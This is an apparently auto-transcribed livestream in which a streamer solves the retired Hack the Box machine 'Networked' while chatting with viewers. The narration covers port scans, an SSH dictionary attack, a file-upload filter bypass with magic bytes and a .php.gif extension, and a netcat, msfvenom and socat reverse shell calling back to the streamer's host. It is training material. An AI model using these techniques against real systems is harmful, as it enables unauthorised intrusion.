Welcome to the stream. Today we have more Hack the Box. Surprise, surprise. If you are a returning viewer, definitely not a surprise to you. But if you're new, welcome to the channel. Thanks for being here. Thanks for hanging out. Today we have a machine called Networked. So let's go ahead and go right into it. This demo is for educational purposes only. Ethical hacking is legal and differs from illegal hacking. Always ensure you have legal permission before performing what you see in this demo. All right, first thing I need to do is I need to start my VPN for Hack the Box. I actually don't have the machine already started. But if you don't know how to start a machine on Hack the Box, this is how you would do it. You'd run open VPN, and then on your VPN pack that you would download from the Hack the Box dashboard, I usually like to do new tab, and then I like to rename this tab to V for VPN, so it's a really small tab, and doesn't take up any space in my bar up here. And then I go to Hack the Box. And then we go to the Hack the Box dashboard. What's up, Max? Thanks for stopping in. Glad to see you here. Is it Ilhan? Am I saying that right? Thanks for being here. Glad to see you in the chat. What's up, Wire Dog? How's it going? Thanks for being here. I forgot to play the music. There we go. What's up, Mr. Nobot? Thanks for being here. Welcome back. All right, and then I go over to machines. What's up, Farula? Thanks for being here. How you doing today? Not much. We just got more Hack the Box here. Another week, another stream. More hacking. All right, so this is a retired machine. Obviously, you can't stream active machines. Otherwise, I would probably stream the active machines, but you can't do that. Networked. It's an easy machine. It's a Linux machine, and that's all we know about it. For those who don't know, all these live streams are black box penetration testing, which means we have very limited knowledge of the target. The only thing I know is that it's a Linux machine. That's all I know. I don't know what ports are running on it. I don't know what services are running on it. I don't know what vulnerabilities there are. And that's what makes it a challenge. I haven't seen any write-ups on this. I haven't read any write-ups, seen any write-ups. I didn't even look at the guided mode questions. But we might do that if I get too stuck. So I do like to keep these streams under 4 hours. So if I start running out of time, then I like to look at write-ups. Or if I just run out of ideas, I'll just check out guided mode and then go from there. You can take the VPN to another workspace. You're talking about like another terminal tab? Yeah, I mean, you could definitely do that, but like if I make another terminal, it's just hard for me to there'll be two here, and then when I click, it'll ask me. It just gets confusing to me. For me, it's just the V helps me out. What's up, Motion? Thanks for stopping in. Glad to see you here. All right, let's go ahead and fix that mic. Can you guys still hear me? Okay, looks like you guys can still hear me. Good. Where it says 1, 2, 3, 4 at the top, those are workspaces. Oh, dude, I never used that. I did know about that, but yeah, that makes a lot of sense, dude. What a game changer! I can't believe I haven't been using this. Dang, that changed everything for me. That makes it. That's a game changer for me. I don't know why I never used that. It's embarrassing. I use Kali Linux every day. Anyways, moving on. We have. I don't want that. No, no, no. All right, so we want to do a port scan. So we're going to do Rust scan here. And we're going to paste our IP address here. So it's Rust scan -A. A stands for address, which is IP address, -R is a range. We're scanning 1 through 65,535, which is every single port. Rust scan is not installed on Kali Linux by default. To install it, go to github.com/rustscan. Rust scan. It's a great tool. I love it. It's a very fast port scanner. And it's pretty reliable too. It hardly ever misses ports. So sometimes it does, which is why I run it multiple times. But recently it hasn't dropped the ball on me. I mean, we've ran this every stream now and it hasn't missed a single port. So signal's not very good. I'm gonna go ahead and chalk that up as a U problem, not a stream problem, because it says excellent on my end. But what's up, New Boon? Thanks for, am I saying that right? The Boon? Thanks for being here. Glad to see you here in the chat. It was my Wi-Fi, my bad. No, you're all good. Do I have a methodical to-do list when pen testing, or you just kind of try everything you can think of? I don't really have a hard set of methodology. Like, and here's the reason for that. Because, you know, everyone says, oh, you got to think outside the box when it comes to pen testing and hacking. It's like, well, if I'm following a checklist, am I really thinking outside the box? You know what I'm saying? So, if I'm following a checklist, I'm not thinking outside the box. So, no, I don't really have a... I mean, there's things I check that's every pen test, every CTF machine. But I just run my initial scans and then go from there. And I kind of just wing it. And I think... I mean, it might not be the best approach, but that's what I like to do because I like the freeform way of doing things. I'm not really a structured kind of person. Like I think putting too much structure around things limits my ability to perform. And that's just not with hacking. That's with everything in life for me. Like I don't have like a set morning routine. I like to work out, but I don't have like I must work out at this time. It's like, would prefer to work out in the morning, but sometimes I don't feel like working out in the morning. I'll work out at 11 o'clock at night, you know what I mean? So, and then same thing for eating. It's like, well, what time do I want to eat? It's like, I don't know, when am I going to get hungry? Is it going to be 1 p.m. or 4 p.m.? Who knows? You know, stuff like that. Or am I going to go to the grocery store? I don't know. Is it going to be 9 a.m. or midnight? It's like I got to do it, but I don't really structure it. Like my to-do list, I have a to-do list. I just write down the things I got to do, and I don't put a time around it. And there's only a certain amount of times when I put a time around it. It's like when it involves other people, then I put a time around it, if that makes sense. So I know that was like a long response too. If I have a methodical checklist. All right, so it looks like we got 22 and 80 open here, according to Rustcan. So let's run this one more time just in case it missed a port. But in the meantime, we can see what's on port 80 by opening up a new tab and typing the IP address in our browser, and we do get a return. We got, hello mate, we're building the new fresh mesh. Help by funding us and be the new Tyler and Cameron. What? What does that even mean? Join us at the pool party this Saturday to get a glimpse. Let's go, no, how do I see the source code? Is it Control U? It is Control U. Upload and gallery not yet linked. That's the only comment that we have. Alright, well, that doesn't really help. Maybe it does, but let's use Buster here. This is my go-to word list. It's the ultimate directory fuzz, which is a combination of RAF large directories, RAF large files, and the derb medium. So I made my own word list by combining 3 other people's word lists. That way I don't have to run the command one time. And to run it, it's just Buster --URL, then the URL, and then -W for the word list you want to use, and then I use -C to cancel out 401, 404, and 403 errors, and -K ignores certificates. So sometimes on these older hack-the-box machines, or self-signed certificates, like if you're on a real pentesting engagement, a lot of clients will have self-signed certificates, or outdated certificates, and if you just do the -K, it just kind of ignores all that. And what we're doing here is we're just fuzzing for endpoints. So, we might find, URL/login or something, for example, and that's what it's finding if you don't know what a directory fuzz is. And Buster is not installed by default, but you can install it very easily. If you just type in Buster and push enter, it'll be like, oh, it's not installed. Do you want to install it? And then just push yes. Run it as sudo, and then you'll install it. Robots.txt. What about nobots.txt? We can definitely check out. I think Buster would find robots.txt. It would definitely be in the word list. So I don't really normally manually crunch it in there because the word list should find it. So far, we don't have any hits on Buster. This is kind of crazy because there's only 2 ports open. It's 22 and 80. So it has to be, the vulnerability has to be on one of those 2 ports. And if there's no endpoints on this, then I don't know. We got 2 usernames, Tyler and Cameron. What if we just brute force these on SSH? That might be the way. Matter of fact, I'm going to start that right now. We'll do file, new tab. We'll do Hydra. -L. What was the names? Tyler. Dash. How does Hydra work again? -L. Let's just do this. Okay. It's dash uppercase P. That's what it is. That's the word list I want to use. So basically, I just got to replace administrator with Tyler here. And then we just got to replace this with SSH. And then we just got to put our IP address here. And this will brute force. Well, not technically a brute force. It's a dictionary attack. There's a slight difference between the two. I'm not going to get into technical details on that. That'd be a good video though. What's the difference between a dictionary attack and a brute force? Dictionary attack is I'm using the word list. Brute force is like you're literally trying every combination of characters. That's what it is in a nutshell. But we are doing a dictionary attack on the Tyler user on SSH. So we'll see what happens. We got 2 usernames potentially. We got Tyler and Cameron. So I don't see any other hints going on here. Let's go back to our Buster. Do we find something? Oh, we got backup. Oh, we got backup.tar. That's nice. Let's see what that is. /backup. Alright, we got some kind of file. We'll see. We got the backup.tar. before we look inside of that, let's just check out index.php. Probably going to be the home. Index.php. Yes, okay, that's exactly what I was expecting. And then there was one more that we found so far, and that's, well, there's uploads too. There's uploads, and then there's lib.php. Let's check out what that is. Lib.php. Nothing there. Let's check out uploads. Okay. We can't view uploads, but we can see this. So they got okay, well that's just a CentOS logo. Let's see what's in that folder. New file, new tab. Let's make a directory called hackthebox / what's the name of this machine? Network. Change directory, hackthebox, networked. And then we run move downloads backup.tar to here. Man, I always forget how to unzip a tar. Is it? I always forget it, dude. That's why I don't like the tools to unzip tars. Like that's why I like zip files. I can literally just type in unzip and then a zip file, and then tar it's like gzip dash all these weird characters. I'm like, why? Why does it gotta be so complicated? That's my rant of the day. There should be like yeah. Unzip.tar, because there's like a bunch. There's like a tar.gz, and it's like, man, why is there so many different tar files, man? I understand why, because there's multiple ways, like different compression algorithms make the files different sizes, and it's more efficient to use these other compressing algorithms rather than just like a zip file. But it drives me nuts. All right, so it's tar xopf backup.tar. See, like who can memorize all that? That's too much. Did it even work, dude? Oh, I'm confused because these are all of the directories that I saw. I was like, oh, did it even work? It did work. It unpacked all of these. So, cat, yeah, I never downloaded any of these. Okay, cat lib.php. What's in here? There's gotta be something interesting in here. tar.xf. Is that how you see? Dude, I don't memorize flags, man. It's too much effort, too much knowledge to memorize when I can just Google it. And I rant about it every time. Anyways, we have. It's possible that fall. Okay. There's gotta be a hint somewhere in this backups. Attack on file. Prefix is not a valid IP. It could be a hint, but I don't know. Let's do cat upload.php. Require lib.php. Okay, that makes sense. Upload directory. The upload directory is var www html uploads. Okay. Invalid image file. This has got to be where the vulnerability is. It's got to be a way I can upload a file and then run it. It's got to be some way I can run upload.php. Can I just go here? All right, cool. So we can upload files here. Invalid image file. Is it checking? I'm gonna try to do a pentest monkey PHP reverse shell and just see if it'll take a PHP file. I know the error code says invalid image format, but just because it says that doesn't mean it will work. Like, they could have coded that wrong. I mean, I could probably get the answer just by reading the code, but I mean, I think it would be easier and more efficient and more reliable if I literally just try to upload a non-image file and see what happens here. So I'm going to get the pentest monkey. I'm actually going to nano. I'm going to put this in my tools folder because I always use it. I got to stop getting it all the time. Tools, pentest monkey.php. Paste this in here. All right, scroll too far up. Okay, we have to change our IP address, which is right here. That's 10.10.16.31, and then port. I'm gonna listen on port 443. Save the file, clear that, and then let's upload and see what happens here. Actually, copy. Yeah, this will work. Let's go home. Tools. Pentestmonkey.php. See what happens. Image. Invalid image file. Okay, yeah. We kind of expected that. There's gotta be a way to bypass this. Alright. Forensics Buster didn't find anything that wasn't in the backup.tar. So it seems like the backup.tar is literally the entire website. Like a backup of the entire website, so that's pretty cool. We gotta figure out how to bypass this. Let's do this in burp. I think burp is our answer here. Well, we can try some bypasses with burp. Magic bites? Yeah, that's what I'm thinking too. So what we're going to do is we're going to go to proxy and we're going to go to intercept, and then we're going to browse and we're going to upload. Let's go to download. So I got we got a logo P, and this one I was going to the TCM Academy. I was actually using this technique in the course. Alright, we'll just hit go on this. And this you get intercepted. Let's go ahead and right click send a repeater. And then basically let's delete all this all the way down. And then we're going to replace it with pentest monkey. So copy this, and then we will paste this in here, and then we will see if we can get a reverse shell here. I mean, most people probably would try to, like, oh, can I just bypass it? I'm gonna go full reverse shell and just see if it works. That's the IP, not the port. 10.10.16.31 443. Okay. Let's go ahead and send this. Alright, so this file upload looks like we successfully bypassed it. So that's really good. But I actually forgot to change the file name to, yeah, let's type in shell. It has to be a PHP. So we didn't bypass it. So this has to be a PHP. Let's see if this works. Okay, that didn't work. So we can do like PHP 5. That didn't work either. Okay. There's a way, if we go to Hacktricks file extension bypass. No, I don't think png.php is not going to work. Turn off intercept. We know it runs PHP, so we need to try one of these. Let's I've had success with this one in the past. PHTML. Let's copy that and go back to repeater, and then we will paste PHTML in here. Send invalid file. All right. All right, let's try like PHP 2, PHP 3, PHP 4, PHP 6. We already tried 5. What's up, Casey? Casey, how's it going? Thanks for stopping in. I can upload if the name's .png, but it's not going to execute it if it has the wrong extension. That's the problem. I did put the contents of the file with the .png extension, but it didn't. Like I said, it's not going to execute if I mean, maybe it will, but I doubt it. I'm gonna keep trying to do this real quick and see if I can find an extension that it'll take here. PHPS. Yeah, you're right. I could make a list for the payload, and then that's what I need to do. You're right. Let's send this to intruder. That way we're not manually doing this. And then payloads. I'm just going to copy all these. That did not work out the way I wanted it to. Alright, clear that out. Let's open up mousepad here. Paste these. Did I highlight the dot? I need to highlight the dot. Oh my gosh. Add. And then let's go back to mousepad. Dot, dot. Okay. Alright, copy this. And then go back to intruder, payloads, paste. Alright. See if that works. What's up, Hein? Thanks for stopping in. How many blocks did I practice for take the OCP exam? I did 40 lab machines, and then I did, I don't know, probably another 20 something hack the box machines, 216 try hackman rooms, and then all of the EJPT training. Malicious traffic detected, you've been blocked. Where did I say that at? It didn't? Oh. You was joking? Alright. Well, you got me. Way fun, thanks for stopping in. How you doing today? Glad to see you in the chat. Alright, I don't know how to bypass this with just the extension. There's gotta be another way we can bypass this. We can try a double extension. Let's try that. That ain't gonna work. Remove. Let's go open up our mouse pad again. Control A. All right, so we want to do hopefully one of these works. Oops, I deleted. Oh, this is saying just do a dot. That's weird. Okay, let's try that then. Alright, so there's more things we can try, and then we also have these. And we have these. I guess technically I could leave the file in there, but we're committed at this point. Alright, let's see what we get with this. Oh, there's a few more we can try. Let's try it. Let's grab these. File, delete those. Control A, copy. And let's clear this out and no, not load, paste. Repeat attack with this new word list. Your OSCP Plus journey begins in December. Nice, good luck. You already have CBTS, so you should be able to slay it pretty easily. In my opinion, from what I'm hearing, CBTS is way harder than OSCP. That's what people are saying. I've never done CBTS, so I can't confirm that, but that's what people are saying. But OSCP is no joke for real. I mean, it's a hard exam. But honestly, some of these hack the box machines are harder than OSCP, dude. I mean, I'm OSCP certified, and I get on here and get my butt kicked every week on a hack the box. So some of these hack the box machines are harder than OSCP. That's what makes them pretty good practice. Invalid image file. None of these work, dude. Most unfortunate, dude. Got me another way to bypass this. I try not to underestimate OSCP. Yeah, you definitely should not do that. You should definitely not do that. It is no joke. It will beat you up. All right, I don't know what to do anymore. I mean, I've tried. That's the only filtering that I really bypass I know how to do. Upload / logo.png. What's up, Cybershark? How's it going? Thanks for stopping in. Is it possible to upload a .tar? Maybe, but that isn't going to help us out because we need to execute it to get a reverse shell. So let's go back. Same image from before. I guess I'll hit the 4. So if we just do 4, try 1, same image. Let's try 2, same image. Let's try 3, same image. All right. Intercept the upload.php in burp and then look at the file. That's what I did. That's what's right here. The upload PHP. Name is my file. File name equals shell.php. Shell.png. So it'll take this. See? Shell.png. I doubt this is going to work, but executable files behind PNG. Or just add the shell to the page's code. I can't add to the code. No, it's not getting triggered. It's not even finding us, so I don't even know why this should have worked. You have the answer, the upload.php and burp. Do intercept. I did intercept it, and that's how I got this response. Or that's how I got this. And then I sent it to repeater. Yeah, I don't know any other file bypass techniques I can try. I still don't understand why my uploads aren't getting uploaded, but you intercepted the upload itself. Are you saying intercept? Upload PHP? I don't see how that helps though. Because I have the code. This is the code for upload PHP right here. But we can intercept it. Hmm. So it checks the end of each file upload name? Yeah. I mean, this might not even be the vulnerability. We can check for other vulnerabilities like SQL injection and stuff, but if you're lucky, you can add .php after intercepting and bypass the filter. Hmm. Yeah, I'm all out of ideas. I'm gonna go to guide mode. It has to be something to do with this upload. If not, I would be very surprised. What version of Apache's run on a target? I don't know how that's relevant, but I mean maybe there's. It also checks a file size is less than 6. No, because it worked when I did .png, so the size isn't it either. Because if I type in .png, it works fine, but then as soon as I change the extension to something else, it doesn't work. I'll be honest, that's the only file upload exploit that I know, and it's not working. So it's either there's got to be another way to bypass the file upload, or there's not a vulnerability in the file upload, but I'm not seeing any other potential vulnerabilities. There could be some SQL injection there, but I doubt it. And I tried with a single quote and didn't get anything. So, I mean, I could try. I would say at this point, like I would just try some SQL injection more intense. But I since this is a easy machine on ActiveBox, I doubt it's going to be a SQL injection. But I could be wrong. I don't think I've ever seen a SQL injection on an easy machine before. It's 2.6.4. Dang, is it gonna let me submit my answer or what? Oh, okay. I have intercept turned on. That's why. There we go. What is the relative path for the directory that contains a backup? It's backups. We found that. We're actually already. What? Is it just slash backup, not with an S? There we go. After reading the source code of the lib, we can see that JPEG, GIF, JPEG, and one other extension can be uploaded. Really? Cat lib.php. I don't see a list of file extensions in here. It says MIME, is that it? Is the answer MIME? Bro, I don't even know what. No, it says it's 3 characters. I don't even know what a MIME database file is. That's not the answer. I don't see any file extensions in here. Well, that didn't help. After reading the source code of load.php, we can see that JPEG, GIF, and JPEG. Bro, where's GIF at? The word GIF doesn't even appear in the file. I keep typing in GIF, PNG. See upload.php? That was misleading if it's in here. It literally says, oh, JPEG. Is it JPEG? Oh, it's .png. I don't know. .png. Alright, easy enough. Wait, what? Oh, without the period. I don't know why it takes so long for us to figure out. We know we can upload PNGs. We've been uploading PNGs. That's a bad question. MIME type protects websites' upload functions from uploading files that are not actually the declared file type. Magic bytes are used to bypass this by pinning the bytes to the payload file. What are the first 8 magic bytes for PNG format? Give your answer as 16 hex characters. The first 8 bytes? Oh my god, dude. Didn't I try to bypass magic bytes? I thought I already tried that. I don't know how to. I guess I go to CyberChef and just paste this in CyberChef to make it hex. It's just PNG, so I don't. 16 hex characters? Is that it? No spaces, maybe? Okay. On Linux operating systems, users have the ability to schedule tasks to run a desired period of time. What is the default task scheduler in Linux? Cron. How is this related right now? According to the backups of the cron file tab for GUI, the check attack.php script is executed every how many minutes? The backup of the cron tab file, where did we get that? Did you guys see a backup of the cron tab file? I don't understand where to get that at. This isn't even the right question for my box. Cron tab for GUI, that's not even the name of the box. This is not. We've ran into this before where Hack the Box doesn't give you the right guided mode question. For GUI, it's not the name of the box. Or maybe that's a user on this box. I guess that could be a thing too. But I don't understand how. Yeah, I was gonna say, this seems like it's after foothold. This is out of place. Search for something like PNG magic bytes. Okay, cool. I do know that like magic bytes, and we try to bypass magic bytes, but it didn't give me a hint on how to bypass it. I mean, I have the first 8 characters of PNG in here, so I don't know what it wants from me. Yeah, I don't know. I have to look at the write-up, man. Huh? Magic bytes for PNG are 89. Okay, which can be added to the beginning of the show. It seems strange. Okay, we're at intruder. He's just saying just put these magic bytes here. Seems... Huh. PHP, PNG. Still not working. Maybe if we get rid of this section here. Still ain't working.
Access granted.
Farula Black Guy, thanks for following over on Twitch. I appreciate you. What's this XXD-P-R? I don't understand. This write-up doesn't make any sense to me. The official write-ups are always the worst. Literally, I had the same line at the beginning of my file that he did, and mine don't work. But that's typically what happens to me. I can do the same thing. 40 time. The magic bytes are wrong. What magic bytes are wrong? My magic bytes are wrong? How? He said he did a who am I, but I don't see his output from who am I. Oh, go to the binary of the data. Oh. So he's just... I'm confused on how that's working. Wish I knew how to go. How do I view the images? That's what I don't understand. Where did he go? Oh, it's photos.php. Alright, so we uploaded the photo, but it's not popping up here. That's just very strange, but okay. How did he view the photo, though? He just grabbed the name of the file. Oh, I think it's kind of cool. It literally, it takes your IP address. What is it, images? That's rough. What's uploads? Not images. Upload slash .png. Okay, well the file is there, but I don't know why the image itself isn't there, but that doesn't make much sense, but okay. It worked. So he just... That's not what I wanted. I got too many tabs open, man. You move test PNG to test PHP PNG. Okay. Copy downloads logo.png to here. Here's my IP address to 10.10.16.31 and 443. This goes into logo.png. And then I keep hitting proceed, don't mean to do that. Okay, so we move logo PNG to logo.php.png. All right, that should work. Browse, go back to root, hack the box, networked. We'll open this and go. And we will forward this request. Okay, Invalid image file. I did the same thing as the guy did in the write-up, man. God damn, bro. I hate this. Every time I do something, it doesn't work. It doesn't work the same for me every time. It's got my magic bites in here, I'm assuming. Yeah. I don't know what else I can do, man. Literally did the exact same thing, step by fucking step. Invalid image. Doesn't matter what I try. I intercepted a normal file upload with burp. The file name, content type, and content itself looked like this. Okay, yeah, that makes sense. I paste it right after my PNG content ends. Dude, I fucking tried that. He did php.png. Intercept. What's up, Namita? Hey, stop it. How you doing today? Logo. Alright. Actually, you know what we need to do? Let's just grab a different. Let's go back to my downloads. Alright, PNG. Regular PNG file. Let's go and intercept this with burp. Okay, intercept is on. Go. Literally, this guy was like, oh yeah, I just put the shellcode right after the end here. I'm like, alright, let's try that then. I didn't try that, but I tried something very similar to that. Let's put the PHP code right at the end, like this guy did it. All right, right at the end. And then he did .php ... How many dots did he do? Three dots. And then let's go ahead and send this to repeater. Send. Invalid file. How? I did nothing different, dude. Everybody, it works for everybody but me. File name. I don't know, man. I don't know what I'm doing the exact same thing as everybody else, but I don't get the same results. It's ridiculous. It's crazy. This is one of the most frustrating things about Hack the Box for me is like, even with like I can do the same exact thing as everybody else, and the results are wildly different. Logo PHP PNG. Yeah, I don't know, man. Invalid file format. Content length. I mean, that might be it. It should change automatically though. Most applications do, but I guess some don't. But these other people aren't changing the content length. That's what I don't understand, dude. That's what I don't understand. Is like, how can everybody else do one thing? I can follow it exactly to the letter, and it's like, yeah, fuck you, dude. You don't get to fucking do it that way. God, I swear, Hack the Box gets more frustrating every week. We uploaded the file as foo.php.gif like this. Bro, he literally just puts a fucking reverse shell in there and it works. Like, he didn't even do any bypassing at all. He literally just slapped the extension on here. I didn't try a GIF. I mean, we can try that. I'm gonna move this. I'm gonna move this to my other monitor so I can type and do this at the same time. Alright, so this guy literally just did foo.php.gif like this. Content slash GIF. What's up, Sirius? Welcome to the stream. Thanks for hopping in. Glad to see you here. GIF 89 a semicolon and then the PHP system netcat-e/bin/sh and then his IP address. So my IP address is 10.10.16.31. I like to listen on 443. Quote, parentheses, that, question mark, bracket. That's it. That's literally all I did. GIF 89A. That worked. So now, in theory, I should be able to go to it's hard to tell what the name of the file is. It should be 10.10.31.gif, I would imagine. Not found. Alright, let's go photos. Photos.php. Alright, here we go. Okay. Let's go back. It's not GIF, it's .php.gif. Let's see if that works. Hey. The GIF worked. The PNG was not working for me. That was frustrating. I still don't understand why didn't PNG didn't work for me, even though I'm doing exactly the same thing as everybody else. That's one thing about me, dude. I feel like everything's harder for me, like in this field. Like every tutorial I run across, I'm like, doesn't work like that for me, dude. What's up, a cat? How's it going? Thanks for stopping in. Where is my command stabilize? Okay, here we go. Let's stabilize this shell here. Or maybe not. Huh. This is a really weird shell, but I mean we can work with this. Ghoulie. Change directory ghoulie. Cat user.txt. Pi invalid. cat cron tab uli. Check attack PHP runs every 3 minutes. Okay, well, can I modify that? I can't nano. My shell is extremely bad. Let's see if we can get something that's a little more stable here. Yeah, of course. Netcat LMVP 443. Let's see if we can just get a more stable show here. There we go. Perfect. Exactly what we want. Change directory. Make sure to be in the same directory. Can I nano here? Nano check. I don't have tab auto complete. Hold on. Nano's out on the machine, bro. Oh gosh. I gotta use Vim. I hate Vim so much. Output is not a terminal. Okay, well it's working, so. Oh, I can't type. Okay, when I type in error keys, I get this weird nonsense. Gross. Okay. What's the term stable shell for? So you see how when I was typing, everything got all weird? Do you see how this is locked up and I can't run any commands right now? Like, you see how I can't do a Vim from here? That's an unstable shell. Like, insert, yeah. See how I can't type anything? If every time I try to move down in this shell, it's not working. So I just destroyed my shell. That's an unstable shell. So now I gotta redo it. Hopefully, my exploit, hopefully this works still. Alright, good. Thanks for the tip, Sirius. Appreciate you. I'm gonna add that to my notes. I didn't have that in my notes. Can I Vim now? Can't tab autocomplete. Let's try this. Oh, now I messed it up. This looks even worse. I made it worse. wish I can quit this. There we go. I messed up the whole show. Hardly ever works for me. Sometimes it works when I do it that way, but hardly ever does. Oops. Oh, did I mean to do that? Alright, let's see if I can do like vim. No. Change directory / home. Change directory GUI. Cat user.txt. Cat user.txt. Okay, yeah. Let's see if I can do vim check attack.php. Can I type in here now? I can't go up and down the file, dude. I don't know how I'm supposed to do this. I can't if I can't type. That's frustrating. Try Python without the 3? Yeah, I can try that too. Not change. Can I do a vim check attack.php? Can I type? I still can't type, dude. Alright. We got another way we can do this. We just, instead of typing, we'll just transfer a whole file over, dude. Well, dang. Now I've lost my shell. This is frustrating. If I could just type in that file, we can get a reverse shell as gooly. But I just can't type. So I'm just going to transfer a file over and replace it altogether. Let's see, raw. Do I just type this in? No, Nana's not on the machine. Alright, well, what we're going to do is we're just going to do this. We're going to split, we're going to start a Python 3 server. http.server 80, and then we're just gonna transfer pentestmonkey.php over. So we'll do a wget pentestmonkey.php. Wget's not on the machine either, bro. What the hell? What kind of machine is this? Curl -o pentestmonkey.php, I think is the right. Oh. Let's try that again. I forgot we have to give it a full URL path. Curl -o http://10.10.16.31/pentestmonkey.php. No URL specified. I think if I do curl -o pentestmonkey.php http://10.10.16.31/pentestmonkey.php. There we go. Alright, so if we do a cat pentestmonkey, we're in there. Alright, so now all we gotta do is just move pentestmonkey.php to /home/girly. Is that the user? Ghoulie. Not with R. There's no R. Change directory Ghoulie. Move /var html/upload/pentestmonkey.php to here. No such file directory. What are you talking about, bro? Ooh, this kills me. Change directory to here. Move pentestmonkey.php to /home/ghoulie, not hoolie, ghoulie. No such file. What are you talking about? Did it clear? Oh, it removed my file. No wonder why. I'm like, how is this possible? Change directories home/ghoulie. Let's clear this out. Let's do a curl -o. Let's call it shell.php. http://10.10.16.31/pentestmonkey.php. Failed writing body. Permission denied. I don't have permission to write in this. Check attack PHP. Alright, well, I'm doing this wrong way anyways. What we need to do is cat check attack PHP. See what this consists of. Okay, I can't scroll up and down. That's awesome. That's really great. That'd be cool if I could. Yeah, it'd be nice if I could read it. No tool lets me do it. Cat nano vim. I can't scroll. It just doesn't let me scroll. Cat. I was gonna try to just replace it and then just hope for the best. But I clearly need to read it, but I can't read it. Cat check attack.php. See, I can't scroll up and down, bro. Doesn't let me. Don't have a stable shell. So what we can do we do like a Python? What's the old way to do a Python server? Do a normal still stabilize. I mean, I've been trying to stabilize my shell. Everything I tried didn't work. You're forgetting Control Z, then ST. I did that. It didn't work. It made it worse, actually. It doesn't have Python 3, but it has regular Python, but I forget how to do a Python HTTP server syntax. Because the Python 3 and the regular Python has two different syntaxes, and I don't know the old syntax. It's Python-m simple HTTP server. We'll do 90. Can I do that? Permission denied, of course. I don't know what to do. I can't transfer files to the machine. I can't transfer files out of the machine. I can't read. I can't write. The terminal's locked up. I don't know what to do. I mean, clearly all I have to do is just read this file and see what file I can edit, and then I can probably put a reverse shell or something in there. But I gotta read this file, and I just know how to read it. What if we did this? Copy. I got an idea. What if we do copy check attack.php into var www slash is it just uploads? Uploads. Permission denied. I can't write. Put pentest monkey in the web root, then get our shell and stabilize it. That might work. You're right. Or I can do home. HTML. Change directory. Upload. The user.txt is a flag. There's not going to be users in there. A mod. But thanks for stopping in the stream. How you doing today? We don't have the permissions to read user txt anyways. Change directory uploads. But that didn't work. Shell.php is in the uploads folder. Shell.php, it's here. But then when I try to execute it, it says file not found somehow. That doesn't make any sense. It's in the uploads folder. Still there. Alright, well, that was one thing we could try. The other thing we could try is we can we can copy home ghoulie / attack. Is that attack check? Curse stream. What does that mean? ls home / ghoulie. What's the name of the file? Check attack php. So what if we copy home / ghoulie check attack.php to here? There we go. So we got check attack php here. This will just run it though. Check attack. That ran it. I just ran PHP. So why did shell PHP not work? You know what I mean? I just ran check attack PHP. I cleared out the directory though. It keeps clearing out everything except for the thing that I don't need anymore. That's wild, man. Move. I can't remember. Permission. I can't put nothing in the backups folder. Home ghoulie. Check attack PHP. I can't move nothing in the backups folder. Yeah, I know it got deleted. That's what I'm saying. But it wasn't deleted before, and it didn't work before, and it's just I don't know. Clear. Put in the web group, not uploads. Yeah, you're right. That's a good idea. Do I have right? I don't have right. I can't write anything here. I can write to uploads though. Okay, so we can do that. So curl-o shell.php http ://10101631/ pentest monkey.php. All right. I should be able to just do a shell.php, not shell that way. Shell. Not cell. Shell. Error response. It's like something that's blocking that. Move shell.php check attack.php. I wonder if it's like a file name or something. Can't run a reverse shell. Man, dude, this box is frustrating, man. I don't know what to do now. I mean, if I could just use the box, you know, I could probably be alright. I can't get a stable shell to read, to even read a file. It's frustrating, dude. Let's try a different reverse shell. I hate this box. Ambiguous redirect. Maybe ambiguous redirect. Too many quotes. Yeah, I'm positive the URL is correct. Like I said, I could run check attack PHP from here, but then I could run shell.php. If I can just get a stable shell, or if I can just read the files. Truly hate this box. I can't write to files. Well, that time it worked, but it didn't execute. Why did that not execute? Because I guess I gotta. Okay, well, damn. I guess it didn't execute because I don't have the right syntax. I guess it's you gotta be in a PHP shell to run it like that. Bro, I'm lost. I don't know how to get a stable shell in this box. I don't know how I can read and write the files that I needed. I think there's a clear path forward, but not without a stable shell. Not when I can't execute the commands I need to execute. Not without reading the files I need to read. I hate this box. I don't know what else to try, dude. If I can just get a stable shell. Hmm. Did that work? No. Hell no, how would that work? Bro, I don't know what to do. The box is broken. Like it does. This is the first time I ever ran across a box that literally just everything I try, I just can't even read a file. Read a file? I can't even read a file, dude. If I can just read a fucking file, man. Jesus Christ. Now my PHP.gif isn't even working, bro. Oh, here it is. Now it is. Okay, good. Take a second. There's one other thing we can try, and that is change directory, the temp directory. We can try this. I swear every week is like the next box is my least favorite box on Hacked Box. It's like the quality of the boxes have went down over time or something. What's up, Space? How's it going? Alright, let's try this. MSF Venom. We're going to make a reverse shell this way. We're going to execute this. This should give us a stable shell if we run it like this. 10.10.16.31 and change this to Linux. Linux 64 shell reverse TCP L host 10.10.16.31. Alright, let's try that. Okay, we got shell here. Okay. What if we do a curl -o shell http ://10.10.16.31/shell. Okay, here it is. Mod +x shell dot slash. Do I got a listener somewhere else? Weird. Netcat LMVP 443. Did it work? It worked. Okay. Oh, then it closed. Go figure. I have never had a shell that just didn't work. Like everything I try, every time I try to upgrade it, everything I can think of, every trick in the book doesn't work. I want to look at the write up and see if there's like some, they got to be using some weird commands or something. I don't know. I was gonna try to avoid looking at the write up, but I just can't. I'm stuck. I can't do nothing. I upgraded Python to make life easier. Yeah, I mean, I did that, but that didn't do anything for me. Okay, so I did see this file, but let's see check the contents of attack PHP. Comments are mine. I don't know how he can see this. Like, I'm not able to view the file. You know what I mean? That's what I don't understand. Like, everybody gets like a different fucking experience than me when they run these boxes. It's like, I can't even read this file. How did he read this file? I don't understand. He touched the file but didn't do that. Oh, here we go. Touch. So he did SoCat here. So all I gotta do is type this command and it should just give me a reverse shell in theory. Gotta set up a listener with SoCat. Alright. And then if I paste this, this should work. Well, wherever my shell is on this box. That should give me a reverse shell after some time. What's up, Al Moment? Thanks for stopping in. Glad to see you here. I don't even know where my shell is, bro. So he makes a file like this. Let's see what happens. It runs every 3 minutes, so welcome back, Mr. Nobot. Back from your Mac. I noticed that, yeah, you got a different avatar and your name's a little bit different on your other computer, huh? Nice. We got 2 Mr. Nobots. Can I get a... Hey, I got one. Holy crap. It actually worked the way it was supposed to work. I got the user flag, but I'm very excited about it. Went to flag rating, bro. This was stupid. This was hard. This wasn't even a medium. This was just like hard. I figured how to make an authorized keys folder. I want to SSH in because I'm tired of these reverse shells. I want to be able to just SSH right into this and then be done. So I'm going to upload. Do I have an SSH key in here? I thought I did. I'll have to make one. I'll be right back, guys. All right, we need to create an SSH key. Let's go back over here. We don't want to do that in that directory. Copy .sh/idrsa.pub to here. Python 3-m http.server 80. And then what we want to do, alright, we're going to clean 